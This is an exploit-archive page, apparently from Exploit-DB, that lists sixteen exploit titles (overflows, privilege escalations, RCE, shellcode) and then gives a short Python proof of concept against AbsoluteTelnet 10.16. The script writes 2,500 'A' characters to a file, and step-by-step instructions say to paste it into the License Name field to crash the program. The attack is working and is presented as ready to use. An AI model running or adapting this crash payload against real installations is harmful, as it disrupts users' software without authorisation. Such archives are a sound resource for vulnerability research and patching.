44198f828c
16 changes to exploits/shellcodes Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode) Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow Huawei eSpace 1.1.11.103 - 'ContactsCtrl.dll' / 'eSpaceStatusCtrl.dll' ActiveX Heap Overflow Encrypt PDF 2.3 - Denial of Service (PoC) PCL Converter 2.7 - Denial of Service (PoC) docPrint Pro 8.0 - Denial of Service (PoC) AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC) BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC) BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC) xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab) xorg-x11-server < 1.20.3 (Solaris 11) - 'inittab Local Privilege Escalation Huawei eSpace 1.1.11.103 - DLL Hijacking Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1) Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2) GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit) eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution Linux x86_64 - Delete File Shellcode (28 bytes)
21 lines
No EOL
688 B
Python
Executable file
21 lines
No EOL
688 B
Python
Executable file
#Exploit Title: AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)
|
|
#Discovery by: Victor Mondragón
|
|
#Discovery Date: 2019-05-19
|
|
#Vendor Homepage: https://www.celestialsoftware.net/
|
|
#Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet10.16.exe
|
|
#Tested Version: 10.16
|
|
#Tested on: Windows 7 Service Pack 1 x64
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: AbsoluteTelent.py
|
|
#2.- Open AbsoluteTelent.txt and copy content to clipboard
|
|
#3.- Open AbsoluteTelnet.exe
|
|
#4.- Select "Help" > "Enter License Key"
|
|
#5.- In "License Name" paste Clipboard
|
|
#6.- Crashed
|
|
|
|
cod = "\x41" * 2500
|
|
|
|
f = open('AbsoluteTelent.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |